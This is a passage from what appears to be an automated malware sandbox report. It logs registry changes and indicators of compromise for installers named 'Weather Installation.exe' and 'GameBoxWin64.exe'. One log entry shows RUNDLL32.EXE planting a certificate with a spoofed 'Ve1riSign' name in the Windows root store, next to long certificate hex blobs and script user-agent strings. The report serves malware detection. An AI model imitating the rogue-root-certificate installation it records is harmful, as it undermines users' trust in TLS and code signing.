Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation chrome.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe -
Processes:
Weather Installation.exeGameBoxWin64.exeRUNDLL32.EXERUNDLL32.EXESetup.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F4D8E13742BDC981EBD0EF67B62108096B4AFEA0\Blob = 030000000100000014000000f4d8e13742bdc981ebd0ef67b62108096b4afea02000000001000000ec020000308202e830820251a00302010202083fa3598555c55e3f300d06092a864886f70d01010b05003081863146304406035504030c3d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303831323035323734325a170d3233303831313035323734325a3081863146304406035504030c3d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d00308189028181009fb498bccb52c3461292962dfadb4bc0c2eb3e3949fb8a17a48ad2eb500f3f075608cbaf1e1515b08fe5c23c30de32c3c1316ac72758c203020a476eb3a7ffe64fd4b970b8e22343f09915489109f9e49ab9c576edd9010d1929bab6b244f3a661ee491f9baa2df0d9002bebbeeebf3e77ddd1100a9c2225cb0774987f6ff6950203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b05000381810084dc24c4599aa28e1b9058bba9df0506044a55326c648a460fe34f3a2e8ffcf5d63a52db437f59713b78d67db235a75f556275148967d37dbb3d7ceee72f20e543314717bc9ad4fee2f877f46184f75fd233e2009ddd866f8d0304660d9494f3377d8f7e193dbe9bc6fe6613adb2931799461d63746ce298746973a6a1f19960 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F4D8E13742BDC981EBD0EF67B62108096B4AFEA0 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F4D8E13742BDC981EBD0EF67B62108096B4AFEA0\Blob = 030000000100000014000000f4d8e13742bdc981ebd0ef67b62108096b4afea02000000001000000ec020000308202e830820251a00302010202083fa3598555c55e3f300d06092a864886f70d01010b05003081863146304406035504030c3d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b3009060355040613025553301e170d3139303831323035323734325a170d3233303831313035323734325a3081863146304406035504030c3d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735311b3019060355040b0c1222286329203230303620566572695369676e31123010060355040a0c0922566572695369676e310b300906035504061302555330819f300d06092a864886f70d010101050003818d00308189028181009fb498bccb52c3461292962dfadb4bc0c2eb3e3949fb8a17a48ad2eb500f3f075608cbaf1e1515b08fe5c23c30de32c3c1316ac72758c203020a476eb3a7ffe64fd4b970b8e22343f09915489109f9e49ab9c576edd9010d1929bab6b244f3a661ee491f9baa2df0d9002bebbeeebf3e77ddd1100a9c2225cb0774987f6ff6950203010001a35d305b300f0603551d130101ff040530030101ff30480603551d110441303f823d56653172695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735300d06092a864886f70d01010b05000381810084dc24c4599aa28e1b9058bba9df0506044a55326c648a460fe34f3a2e8ffcf5d63a52db437f59713b78d67db235a75f556275148967d37dbb3d7ceee72f20e543314717bc9ad4fee2f877f46184f75fd233e2009ddd866f8d0304660d9494f3377d8f7e193dbe9bc6fe6613adb2931799461d63746ce298746973a6a1f19960 RUNDLL32.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E Weather Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F4D8E13742BDC981EBD0EF67B62108096B4AFEA0 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 10 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 695 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 231 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 256 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 261 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 293 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 225 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 226 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 259 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 326 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
